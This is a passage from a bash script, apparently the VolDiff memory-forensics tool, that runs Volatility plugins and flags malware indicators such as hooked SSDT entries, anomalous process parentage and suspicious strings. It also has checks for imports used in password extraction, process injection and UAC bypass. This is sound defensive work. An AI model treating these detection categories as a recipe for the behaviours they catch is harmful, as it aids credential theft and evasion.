    cat $output_dir/drivermodule/diff-drivermodule.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_drivermodule.tmp
    if [[ -s $output_dir/tmpfolder/unknown_drivermodule.tmp ]]; then
      echo -e "\n\nNew suspicious drivermodule entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/drivermodule/infected-drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/drivermodule/infected-drivermodule.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_drivermodule.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find unknown driverirp entries:
    cat $output_dir/driverirp/diff-driverirp.txt | grep -i "UNKNOWN" > $output_dir/tmpfolder/unknown_driverirp.tmp
    if [[ -s $output_dir/tmpfolder/unknown_driverirp.tmp ]]; then
      echo -e "\n\nNew suspicious driverirp entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/unknown_driverirp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hooked ssdt functions:
    cat $output_dir/ssdt/diff-ssdt.txt | grep -i -E -v '(ntos|win32k)' | grep -i "Entry" > $output_dir/tmpfolder/hooked_ssdt.tmp
    if [[ -s $output_dir/tmpfolder/hooked_ssdt.tmp ]]; then
      echo -e "\n\nNew hooked ssdt functions." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/hooked_ssdt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find manipulated idt entries:
    cat $output_dir/idt/diff-idt.txt | grep -i "rsrc" > $output_dir/tmpfolder/manipulated_idt.tmp
    if [[ -s $output_dir/tmpfolder/manipulated_idt.tmp ]]; then
      echo -e "\n\nManipulated idt entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/idt/infected-idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/idt/infected-idt.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/manipulated_idt.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # display orphan threads:
    cat $output_dir/orphanthreads/diff-orphanthreads.txt > $output_dir/tmpfolder/orphanthreads.tmp
    if [[ -s $output_dir/tmpfolder/orphanthreads.tmp ]]; then
      echo -e "\n\nOrphan threads." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/orphanthreads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - STRINGS ################################

    echo -e "Hunting for badness in memory strings..."
    # dumping and analysing registry for anomalies
    mkdir $output_dir/dumpregistry
    mkdir $output_dir/tmpfolder/baselineregistry
    mkdir $output_dir/dumpregistry/infectedregistry
    vol.py --profile=$profile -f $baseline_memory_image dumpregistry -D $output_dir/tmpfolder/baselineregistry &> /dev/null &
    vol.py --profile=$profile -f $infected_memory_image dumpregistry -D $output_dir/dumpregistry/infectedregistry &> /dev/null &
    wait
    strings -a -td $output_dir/tmpfolder/baselineregistry/* | sort | uniq > $output_dir/tmpfolder/baseline-registry-strings.txt
    strings -a -td $output_dir/dumpregistry/infectedregistry/* | sort | uniq > $output_dir/tmpfolder/infected-registry-strings.txt
    diff $output_dir/tmpfolder/baseline-registry-strings.txt $output_dir/tmpfolder/infected-registry-strings.txt | grep -E "^>" | sed 's/^..//' &> $output_dir/dumpregistry/diff-registry-strings.txt
    # find ips/domains/emails in new registry strings:
    cat $output_dir/dumpregistry/diff-registry-strings.txt | grep -o -E '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/tmpfolder/diff-reg-ip-domains.tmp
    cat $output_dir/dumpregistry/diff-registry-strings.txt | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/tmpfolder/diff-reg-ip-domains.tmp
    cat $output_dir/dumpregistry/diff-registry-strings.txt | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/tmpfolder/diff-reg-ip-domains.tmp
    if [[ -s $output_dir/tmpfolder/diff-reg-ip-domains.tmp ]] ; then
      echo -e "\n\nNew IPs, domains and email addresses found in registry." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/diff-reg-ip-domains.tmp | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    # find other suspicious strings in registry:
    for pattern in Web Antivirus Virtualisation Sandbox Sysinternals Shell Keylogger Filepath Password Powershell Infogathering Executable Banking Encryption Socialsites Other ; do
      case $pattern in
        Web)            regex_str=$web_regex_str ;;
        Antivirus)      regex_str=$antivirus_regex_str ;;
        Virtualisation) regex_str=$virtualisation_regex_str ;;
        Sandbox)        regex_str=$sandbox_regex_str ;;
        Sysinternals)   regex_str=$sysinternals_regex_str ;;
        Shell)          regex_str=$shell_regex_str ;;
        Keylogger)      regex_str=$keylogger_regex_str ;;
        Filepath)       regex_str=$filepath_regex_str ;;
        Password)       regex_str=$password_regex_str ;;
        Powershell)     regex_str=$powershell_regex_str ;;
        Infogathering)  regex_str=$infogathering_regex_str ;;
        Executable)     regex_str=$exec_regex_str ;;
        Banking)        regex_str=$banking_regex_str ;;
        Encryption)     regex_str=$crypto_regex_str ;;
        Socialsites)    regex_str=$socialsites_regex_str ;;
        Other)          regex_str=$other_regex_str ;;
      esac

      # the regex is quoted so whitespace or glob characters inside it are not split or expanded by the shell
      if grep -E -i "$regex_str" $output_dir/dumpregistry/diff-registry-strings.txt > /dev/null ; then
        echo -e "\n\n$pattern strings found in registry." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        grep -E -i "$regex_str" $output_dir/dumpregistry/diff-registry-strings.txt | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    # running volatility strings plugin
    mkdir $output_dir/strings
    strings -a -td $output_dir/malfind/dump-dir-infected/* > $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    strings -a -td $output_dir/procdump/* >> $output_dir/tmpfolder/process-strings.tmp 2> /dev/null
    vol.py --profile=$profile -f $infected_memory_image strings -S --string-file=$output_dir/tmpfolder/process-strings.tmp &> $output_dir/strings/process-strings-vol.txt

    # find ips/domains/emails in strings:
    cat $output_dir/strings/process-strings-vol.txt | grep -E '\b(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' | uniq >> $output_dir/tmpfolder/infected-ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | uniq >> $output_dir/tmpfolder/infected-ip-domains.tmp
    cat $output_dir/strings/process-strings-vol.txt | grep -E "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | uniq >> $output_dir/tmpfolder/infected-ip-domains.tmp
    if [[ -s $output_dir/tmpfolder/infected-ip-domains.tmp ]] ; then
      echo -e "\n\nNew IPs, domains and email addresses found in memory strings." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/infected-ip-domains.tmp | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    
    # find other suspicious strings in memory:
    for pattern in Web Antivirus Virtualisation Sandbox Sysinternals Shell Keylogger Filepath Password Powershell Infogathering Executable Banking Encryption Socialsites Other ; do
      case $pattern in
        Web)            regex_str=$web_regex_str ;;
        Antivirus)      regex_str=$antivirus_regex_str ;;
        Virtualisation) regex_str=$virtualisation_regex_str ;;
        Sandbox)        regex_str=$sandbox_regex_str ;;
        Sysinternals)   regex_str=$sysinternals_regex_str ;;
        Shell)          regex_str=$shell_regex_str ;;
        Keylogger)      regex_str=$keylogger_regex_str ;;
        Filepath)       regex_str=$filepath_regex_str ;;
        Password)       regex_str=$password_regex_str ;;
        Powershell)     regex_str=$powershell_regex_str ;;
        Infogathering)  regex_str=$infogathering_regex_str ;;
        Executable)     regex_str=$exec_regex_str ;;
        Banking)        regex_str=$banking_regex_str ;;
        Encryption)     regex_str=$crypto_regex_str ;;
        Socialsites)    regex_str=$socialsites_regex_str ;;
        Other)          regex_str=$other_regex_str ;;
      esac

      # the regex is quoted so whitespace or glob characters inside it are not split or expanded by the shell
      if grep -E -i "$regex_str" $output_dir/strings/process-strings-vol.txt > /dev/null ; then
        echo -e "\n\n$pattern strings found in memory." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        grep -E -i "$regex_str" $output_dir/strings/process-strings-vol.txt | sort | uniq >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    ################################ MALWARE CHECKS - IMPORTS ################################

    # analyse import tables in new processes:
    plugin=impscan
    tail -n +4 $output_dir/psscan/diff-psscan.txt | tr -s ' ' | cut -d " " -f 3 | sort | uniq > $output_dir/tmpfolder/procids.tmp
    cat $output_dir/malfind/diff-malfind.txt | grep "Address:" | cut -d ' ' -f 4 | sort | uniq >> $output_dir/tmpfolder/procids.tmp
    cat $output_dir/tmpfolder/procids.tmp | sort | uniq > $output_dir/tmpfolder/pids.tmp
    while read pid; do
      # dual-image mode: scan imports in the infected image (memory_image is only set in standalone mode)
      vol.py --profile=$profile -f $infected_memory_image $plugin -p $pid &> $output_dir/tmpfolder/$pid-imports.tmp
      # resolve the process name; anchor on " $pid$" so PID 880 does not also match 1880
      process=$(tail -n +4 $output_dir/psscan/infected-psscan.txt | tr -s ' ' | cut -d ' ' -f 1-3 | grep -E " $pid$" | cut -d ' ' -f 2 | sort | uniq)
      # searching for anti debug import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $anti_debug_imports > $output_dir/tmpfolder/$pid-imports-susp.tmp
      # search for password extraction import functions 
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $password_extract_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for web request import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $web_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for service import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $service_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for process injection import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $process_injection_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for uac bypass import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $uac_bypass_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      # searching for misc import functions
      cat $output_dir/tmpfolder/$pid-imports.tmp | grep -i -E $misc_imports >> $output_dir/tmpfolder/$pid-imports-susp.tmp
      if [[ -s $output_dir/tmpfolder/$pid-imports-susp.tmp ]] ; then
        echo -e "\n\nSuspicious imports in process $process." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/tmpfolder/$pid-imports.tmp >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/tmpfolder/$pid-imports-susp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/pids.tmp

  fi

  ################################ REPORT CREATION ################################
  if [[ $@ =~ "--no-report" ]] ; then
    endtime=$(date +%s)
    echo -e "\nAll done in $(($endtime - $starttime)) seconds."
    rm -r $output_dir/tmpfolder &> /dev/null
    notify-send "VolDiff execution completed."
    exit
  fi
  echo -e "Creating a report..."
  report=VolDiff-report.txt
  touch $output_dir/$report
  echo -e " _    __      ______  _ ________" >> $output_dir/$report
  echo -e "| |  / /___  / / __ \(_) __/ __/" >> $output_dir/$report
  echo -e "| | / / __ \/ / / / / / /_/ /_  " >> $output_dir/$report
  echo -e "| |/ / /_/ / / /_/ / / __/ __/  " >> $output_dir/$report
  echo -e "|___/\____/_/_____/_/_/ /_/     " >> $output_dir/$report
  echo -e "\nVolatility analysis report generated by VolDiff v$version." >> $output_dir/$report 
  echo -e "Download the latest VolDiff version from https://github.com/aim4r/VolDiff/.\n" >> $output_dir/$report
  echo -e "Baseline memory image: $baseline_memory_image" >> $output_dir/$report 
  echo -e "Infected memory image: $infected_memory_image" >> $output_dir/$report 
  echo -e "Profile: $profile" >> $output_dir/$report 
  touch $output_dir/tmpfolder/no_new_entries.tmp
  for plugin in "${plugins_to_report[@]}"
  do
    if [[ -s $output_dir/$plugin/diff-$plugin.txt ]] ; then  
      # processing pslist and psscan output:
      if [[ $plugin = "pslist"  ]] || [[ $plugin = "psscan"  ]] ; then
       echo -e "\n\nNew $plugin entries." >> $output_dir/$report
       echo -e "===========================================================================\n" >> $output_dir/$report
       sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
       sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
       cat $output_dir/$plugin/baseline-$plugin.txt | tr -s ' ' | cut -d " " -f 3 > $output_dir/tmpfolder/baseline-pids.tmp
       cat $output_dir/$plugin/infected-$plugin.txt | tr -s ' ' | cut -d " " -f 3  > $output_dir/tmpfolder/infected-pids.tmp
       # overwrite (not append) so PIDs from the pslist pass are not re-reported in the psscan pass
       diff $output_dir/tmpfolder/baseline-pids.tmp $output_dir/tmpfolder/infected-pids.tmp | grep -E "^>" | sed 's/^..//' | uniq &> $output_dir/tmpfolder/unique-new-pids.tmp
       while read pid; do
         cat $output_dir/$plugin/infected-$plugin.txt | grep -E "[a-zA-Z] +$pid " >> $output_dir/$report
       done < $output_dir/tmpfolder/unique-new-pids.tmp

      #processing netscan output
      elif [[ $plugin = "netscan"  ]] ; then
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================\n" >> $output_dir/$report
        sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
      #filtering mutantscan output
      elif [[ $plugin = "mutantscan"  ]] ; then
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================" >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt | tr -s ' ' | cut -d ' ' -f 6 | sort | uniq >> $output_dir/$report
        if [[ $@ =~ "--add-hints" ]] ; then
          echo -e "\nHint: Google mutants associated with suspicious processes." >> $output_dir/$report
        fi

      # processing plugins that don't need output formatting:
      elif [[ $plugin = "devicetree" ]] || [[ $plugin = "orphanthreads" ]] || [[ $plugin = "cmdline" ]] || [[ $plugin = "consoles" ]] || [[ $plugin = "svcscan" ]] || [[ $plugin = "driverirp" ]] || [[ $plugin = "malfind" ]] || [[ $plugin = "shellbags" ]] || [[ $plugin = "iehistory" ]] || [[ $plugin = "sessions" ]] || [[ $plugin = "eventhooks" ]] ; then
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================\n" >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report

      # processing other plugins:
      else
        echo -e "\n\nNew $plugin entries." >> $output_dir/$report
        echo -e "===========================================================================\n" >> $output_dir/$report
        sed -n '2p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        sed -n '3p' $output_dir/$plugin/infected-$plugin.txt >> $output_dir/$report
        cat $output_dir/$plugin/diff-$plugin.txt >> $output_dir/$report
      fi
      # adding hints to help in further analysis:
      if [[ $@ =~ "--add-hints" ]] ; then
        if [[ $plugin = "malfind" ]] ; then
          echo -e "\nHint: Suspicious malfind processes were dumped to disk, and can be reversed as normal or uploaded to VirusTotal." >> $output_dir/$report
        fi
        if [[ $plugin = "drivermodule" ]] ; then
          echo -e "\nHint: Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "driverscan" ]] ; then
          echo -e "\nHint: Drivers that have no associated service should be considered as suspicious. Use moddump -b to dump suspicious drivers from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "psxview" ]] ; then
          echo -e "\nHint: Use procexedump to dump suspicious processes from memory to disk." >> $output_dir/$report
        fi
        if [[ $plugin = "netscan" ]] ; then
          echo -e "\nHint: Translate suspicious IPs to domains using Google/VirusTotal, and search for the associated domains in memory strings." >> $output_dir/$report
        fi
        if [[ $plugin = "ssdt" ]] ; then
          echo -e "\nHint: Some rootkits manipulate SSDT entries to hide their files or registry entries from usermode." >> $output_dir/$report
        fi
        if [[ $plugin = "iehistory" ]] ; then
          echo -e "\nHint: iehistory can reveal history details of malware that uses the WinINet API." >> $output_dir/$report
        fi
        if [[ $plugin = "envars" ]] ; then
          echo -e "\nHint: Some malware will change the PATH and PATHEXT environment variables." >> $output_dir/$report
        fi
        if [[ $plugin = "messagehooks" ]] ; then
          echo -e "\nHint: messagehooks can detect hooks that attempt to capture user keystrokes." >> $output_dir/$report
        fi
      fi
    else
      echo -e "$plugin" >> $output_dir/tmpfolder/no_new_entries.tmp 
    fi
  done

  # display list of plugins with no notable changes:
  if [[ -s $output_dir/tmpfolder/no_new_entries.tmp ]]; then
    echo -e "\n\nNo notable changes to highlight from the following plugins." >> $output_dir/$report
    echo -e "===========================================================================\n" >> $output_dir/$report
    cat $output_dir/tmpfolder/no_new_entries.tmp >> $output_dir/$report
  fi

  # display list of plugins hidden from report (verbose):
  echo -e "\n\nPlugins that were executed but are not included in the report above." >> $output_dir/$report
  echo -e "===========================================================================\n" >> $output_dir/$report
  echo -e "filescan\nhandles\ngetsids\ndeskscan\ndlllist\nldrmodules\natoms\nsvcscan\natomscan\nidt\ngdt\ntimers\ngditimers" >> $output_dir/$report

  # add identified process anomalies to the report:
  if [[ $@ =~ "--malware-checks" ]] ; then
    if [[ -s $output_dir/tmpfolder/malware-checks.tmp ]]; then
      echo -e "" >> $output_dir/$report
      echo "   _               _           _         __                 _ _       " >> $output_dir/$report
      echo "  /_\  _ __   __ _| |_   _ ___(_)___    /__\ ___  ___ _   _| | |_ ___ " >> $output_dir/$report
      echo -E " //_\\\\| '_ \\ / _\` | | | | / __| / __|  / \\/// _ \\/ __| | | | | __/ __|" >> $output_dir/$report
      echo -E "/  _  \\ | | | (_| | | |_| \\__ \\ \\__ \\ / _  \\  __/\\__ \\ |_| | | |_\\__ \\" >> $output_dir/$report
      echo "\_/ \_/_| |_|\__,_|_|\__, |___/_|___/ \/ \_/\___||___/\__,_|_|\__|___/" >> $output_dir/$report
      echo "                     |___/                                            " >> $output_dir/$report
      cat $output_dir/tmpfolder/malware-checks.tmp >> $output_dir/$report
    fi
  fi

  echo -e "\n\nEnd of report." >> $output_dir/$report
  rm -r $output_dir/tmpfolder &> /dev/null

  endtime=$(date +%s)
  echo -e "\nAll done in $(($endtime - $starttime)) seconds, report saved to $output_dir/$report."
  notify-send "VolDiff execution completed."

################################################################## ENTER STANDALONE MODE ################################################################## 

elif [[ $mode = "standalone" ]] ; then
  echo -e "Only one memory image specified: enter standalone mode..."
  ################################ SETTING PROFILE AND FINDING PATH TO MEMORY IMAGES ################################
  if [[ -f $1 ]] ; then
    memory_image=$1
    echo -e "Path to memory image: $memory_image..."
  elif [[ -f infected.raw ]] ; then
    memory_image=infected.raw
    echo -e "Path to memory image is not valid or was not specified. Using default ($memory_image)..."
  elif [[ -f infected.vmem ]] ; then
    memory_image=infected.vmem
    echo -e "Path to memory image is not valid or was not specified. Using default ($memory_image)..."
  else
    echo -e "Please specify a path to a memory image."
    exit
  fi
  if [[ -z $2 ]] ; then
    profile=Win7SP0x86
    echo -e "Profile is not specified. Using default ($profile)..."
  elif [[ $2 != Win7SP1x64 ]] &&  [[ $2 != Win7SP0x86 ]] &&  [[ $2 != Win7SP0x64 ]] &&  [[ $2 != Win7SP1x86 ]] ;  then
    profile=$2
    echo -e "WARNING: This script was only tested using Windows 7 profiles. The specified profile ($profile) seems different!" 
  else
    profile=$2
    echo -e "Profile: $profile..."
  fi

  ################################ CREATING FOLDER TO STORE OUTPUT ################################
  starttime=$(date +%s)
  output_dir=VolDiff_$(date +%F_%R)
  mkdir $output_dir
  mkdir $output_dir/tmpfolder

  ################################ RUNNING VOLATILITY PLUGINS ################################
  echo -e "Running a selection of volatility plugins (time consuming)..."
  for plugin in "${plugins_to_run[@]}"
  do
    echo -e "Volatility plugin "$plugin" execution in progress..."
    mkdir $output_dir/$plugin
    if [[ $plugin = "mutantscan" ]] || [[ $plugin = "handles" ]] || [[ $plugin = "privs" ]]  || [[ $plugin = "envars" ]] ; then
      vol.py --profile=$profile -f $memory_image $plugin --silent &> $output_dir/$plugin/$plugin.txt
    elif [[ $plugin = "orphanthreads" ]]  ; then
      vol.py --profile=$profile -f $memory_image threads -F OrphanThread &> $output_dir/orphanthreads/orphanthreads.txt
    elif [[ $plugin = "psxview" ]]  ; then
      vol.py --profile=$profile -f $memory_image psxview -R &> $output_dir/psxview/psxview.txt
    elif [[ $plugin = "malfind" ]] ; then
      mkdir $output_dir/$plugin/dump-dir
      vol.py --profile=$profile -f $memory_image $plugin -D $output_dir/$plugin/dump-dir &> $output_dir/$plugin/$plugin.txt
    else
      vol.py --profile=$profile -f $memory_image $plugin &> $output_dir/$plugin/$plugin.txt
    fi
  done
  wait

  if [[ $@ =~ "--malware-checks" ]] ; then
    echo -e "Hunting for anomalies in $memory_image processes..."
    touch $output_dir/tmpfolder/malware-checks.tmp

    ################################ MALWARE CHECKS - NETWORK ################################

    # compute unique IPs from netscan output:
    cat $output_dir/netscan/netscan.txt | grep -o -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | uniq | grep -v -E "127\.0\.0\.1|0\.0\.0\.0" > $output_dir/tmpfolder/netscan-uniq-ips.tmp
    if [[ -s $output_dir/tmpfolder/netscan-uniq-ips.tmp ]]; then
      echo -e "\n\nUnique IP addresses from netscan output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/netscan-uniq-ips.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - PROCESS CHECKS ################################
   
    # verify PID of System process = 4
    cat $output_dir/psscan/psscan.txt | grep " System " | tr -s ' ' | cut -d " " -f 3 > $output_dir/tmpfolder/system-pids.tmp
    while read pid; do
      if [[ $pid != "4" ]] ; then
        echo -e "\nSuspicious 'System' process running with PID $pid (expected PID 4)." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/system-pids.tmp

    # verify that only one instance of certain processes is running (the leading space anchors the name to the start of the Name column):
    for process in " services.exe" " System" " wininit.exe" " smss.exe" " lsass.exe" " lsm.exe" " explorer.exe"; do
      if [[ "$(grep -c "$process" $output_dir/psscan/psscan.txt)" != "1" ]] ; then
        echo -e "\n\nMultiple instances of$process were detected." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        grep "$process" $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    # verify that some processes do not have a child:
    for process in "lsass.exe" "lsm.exe"; do
      cat $output_dir/psscan/psscan.txt | grep $process | tr -s ' ' | cut -d " " -f 3 >> $output_dir/tmpfolder/cpids.tmp
    done
    cat $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d " " -f 4 >> $output_dir/tmpfolder/ppids.tmp
    while read pid; do
      while read ppid; do
        if [[ "$pid" == "$ppid" ]]; then
          echo -e "\n\nProcess with (PID $ppid) is not supposed to be a parent." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/ppids.tmp
    done < $output_dir/tmpfolder/cpids.tmp

    # verify child/parent process relationships:
    for child in " svchost.exe" " smss.exe" " conhost.exe" " audiodg.exe" " services.exe" " lsass.exe" " lsm.exe" " taskhost.exe" " spoolsv.exe" " sppsvc.exe" " taskhost.exe" " mscorsvw.exe" " TPAutoConnSvc" " SearchIndexer" " WmiPrvSE.exe" ; do
      if [[ $child = " sppsvc.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " mscorsvw.exe" ]] || [[ $child = " TPAutoConnSvc" ]] || [[ $child = " SearchIndexer" ]] || [[ $child = " svchost.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " spoolsv.exe" ]] ; then parent=" services.exe" ; fi
      if [[ $child = " smss.exe" ]] ; then parent=" System" ; fi
      if [[ $child = " WmiPrvSE.exe" ]] || [[ $child = " audiodg.exe" ]]  ; then parent=" svchost.exe"; fi
      if [[ $child = " conhost.exe" ]] ; then parent=" csrss.exe" ; fi
      if [[ $child = " services.exe" ]] || [[ $child = " lsass.exe" ]] || [[ $child = " lsm.exe" ]] ; then parent=" wininit.exe" ; fi

      if grep $child $output_dir/psscan/psscan.txt > /dev/null ; then
        if [[ "$(cat $output_dir/psscan/psscan.txt | grep $parent | wc -l)" = "1" ]] ; then
          cat $output_dir/psscan/psscan.txt | grep $child | tr -s ' ' | cut -d " " -f 4 > $output_dir/tmpfolder/child-ppids.tmp
          parent_pid="$(cat $output_dir/psscan/psscan.txt | grep $parent | tr -s ' ' | cut -d ' ' -f 3)"
          while read ppid; do
            ppid=$( printf $ppid )
            parent_pid=$( printf $parent_pid )
            if [[ $ppid != $parent_pid ]] ; then
              tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 2-3 | grep -i " "$ppid | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppidprocess.tmp
              if [[ -s $output_dir/tmpfolder/ppidprocess.tmp ]] ; then   
                ppidlines=$(wc -l < $output_dir/tmpfolder/ppidprocess.tmp)
                if [[ $ppidlines = 1 ]] ; then
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid (`cat $output_dir/tmpfolder/ppidprocess.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                else
                  cat $output_dir/tmpfolder/ppidprocess.tmp | tr '\n' ' ' > $output_dir/tmpfolder/ppparents.tmp
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid ( multiple associated processes: `cat $output_dir/tmpfolder/ppparents.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                fi
              else
                echo -e "\n\nUnexpected parent process for$child: PPID $ppid (could not map associated process name) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
              fi
            fi     
          done < $output_dir/tmpfolder/child-ppids.tmp
        fi
      fi

    done

    # verify that every process has a parent (except for explorer.exe, csrss.exe, wininit.exe and winlogon.exe):
    mkdir $output_dir/tmpfolder/ppids
    tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 4 | sort | uniq | grep -v "^0$" > $output_dir/tmpfolder/ppids/ppids.temp
    tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 3 | sort | uniq > $output_dir/tmpfolder/ppids/pids.temp
    while read ppid; do 
      if ! grep -E "^$ppid$" $output_dir/tmpfolder/ppids/pids.temp > /dev/null ; then
